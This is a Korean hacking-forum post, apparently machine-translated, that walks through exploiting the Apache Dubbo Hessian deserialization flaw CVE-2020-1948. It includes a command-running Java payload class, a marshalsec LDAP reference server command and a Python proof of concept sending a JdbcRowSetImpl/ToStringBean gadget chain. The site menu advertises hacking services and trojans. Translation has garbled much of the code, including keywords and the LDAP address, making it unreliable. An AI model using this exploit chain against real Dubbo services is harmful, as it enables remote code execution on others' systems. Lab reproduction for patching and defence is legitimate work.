[ HOME ]  [ 개인정보 보호정책 ]  [ 0day ]  [ 업무 합작 ]  [ 해킹 서비스 ]  [ 프로젝트 개발 ]  [ faq ]  [ 연락하기 ]  [ 원격 제어 트로이 목마 ]  [ 지불 ]    사용자: 25793     
Telegram

제목 : Apache Dubbo 제공 업체 Desorialization 취약성 (CVE-2020-1948)

K

KoreanHackerTeam

Moderator

Apache Dubbo Provider反序列化漏洞(CVE-2020-1948)​

Apache Dubbo 제공 업체에는 사막화 취약점이 있습니다. 공격자는 RPC 요청을 통해 인식되지 않은 서비스 이름 또는 메소드 이름 및 일부 악성 매개 변수 페이로드를 보낼 수 있습니다. 악의적 인 매개 변수가 사형화되면 원격 코드 실행이 발생할 수 있습니다.

影响版本​

Dubbo 2.7.0-2.7.6
더보 2.6.0-2.6.7
Dubbo 2.5.x (공식적으로 더 이상 유지되지 않음)

环境搭建​

복제 환경 :
스코틀랜드 사람
더보 2.5.9
JDK 8U20
환경 다운로드 주소 :
gist.github.com

Dubbo Remote command execution via hessian protocol using marshalsec's gadgets

Dubbo Remote command execution via hessian protocol using marshalsec's gadgets - README.md
gist.github.com gist.github.com
다운로드 된 환경을 아이디어로 가져옵니다.
20200702085332.png-water_print

Mac 아래에 Zookeeper 설치 :
1
2
양조를 설치 한 동물원
양조 서비스는 Zookeeper를 시작합니다
공급자 .java 파일을 수정하고 스프링이 구성 파일을로드하는 방법을 지정하십시오.
classPathXmlApplicationContext context=new ClassPathXMlApplicationContext ( 'file:/volumes/macOS/workspace/java/dubbo-poc/dubbomodules/src/resources/provider.xml');
Consumer.java 파일을 수정하고 스프링이 구성 파일을로드하는 방법을 지정하십시오.
classPathXmlApplicationContext Context=new ClassPathXmlApplicationContext ( 'file:/volumes/macOS/workspace/java/dubbo-poc/dubboconsumer/resources/consumer.xml');
run provider.java :
20200702085823.png-water_print

ExportObject.java를 컴파일합니다
1
2
3
4
5
6
7
8
9
10
11
12
13
공개 클래스 ExportObject {
public exportobject ()는 예외를 던져 {
노력하다 {
java.lang.runtime.getRuntime (). exec ( 'Open /system/applications/calculator.app');
} catch (java.io.ioexception e) {
e.printstacktrace ();
}
}
public static void main (string [] args)은 예외 {
ExportObject e=new ExportObject ();
}
}
1
Javac ExportObject.java
참고 : 여기에서 동일한 버전 또는 하위 버전의 JDK로 컴파일해야합니다. 그렇지 않으면 사막화가 실패합니다.
LDAP 서비스 시작 :
1
Java -cp Marshalsec-0.0.3-SnapShot-all.jar Marshalsec.jndi.ldaprefserver 'http://127.0.0.1:8000/#ExportObject'8087
20200702090230.png-water_print

HTTP 서비스 시작 :
1
Python3 -m http.server
20200702090353.png-water_print

소비자를 실행하고 자바 및 사제화 :
20200702090516.png-water_print

계산기가 성공적으로 나타날 수 있음이 밝혀졌습니다.
POC로 테스트 :
PIP 설치 Dubbo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
스물 하나
스물 두 번째
스물 셋
24
dubbo.codec.hessian2 import decoder, new_object에서
Dubbo.Client에서 Dubboclient를 가져옵니다
클라이언트=dubboclient ( '127.0.0.1', 20881)
jdbcrowsetimpl=new_object (
'com.sun.rowset.jdbcrowsetimpl',
DataSource='ldap: //127.0.0.133608087/#ExportObject',
strmatchcolumns=[ 'foo']
))
jdbcrowsetimplclass=new_object (
'java.lang.class',
이름='com.sun.rowset.jdbcrowsetimpl',
))
tostringbean=new_object (
'com.rometools.rome.feed.impl.tostringbean',
beanclass=jdbcrowsetimplclass,
obj=jdbcrowsetimpl
))
resp=client.send_request_and_return_response (
service_name='org.apache.dubbo.spring.boot.demo.consumer.demoservice',
method_name='rce',
args=[Tostringbean])
 
여기에 답변하려면 로그인 또는 등록해야합니다.

Partner Website: HACKHUB TW hacker Team Black hat dark Web hacking team HACKING FOURM HACKER.BZ UKhacker
대한민국 최대 해커 포럼:본 사이트의 튜토리얼, 글, 도구 및 기타 관련 내용은 학습과 연구용으로만 제공되며, 그 목적은 대중의 인터넷 보안의식과 보안능력을 제고하는 것입니다.
우리는 어떤 형식의 불법 활동이든 강력히 반대하며, 타인의 네트워크 시스템에 침입하거나 공격하거나 파괴하는 허가 없는 행위를 금지한다.
Copyright © 2013-2025 KRHACK 당신은 우리의 텔레그램에 연락해서 업무 협력을 할 수 있다: @APTs37  웹 싸이트 지도Sitemap
뒤로
상단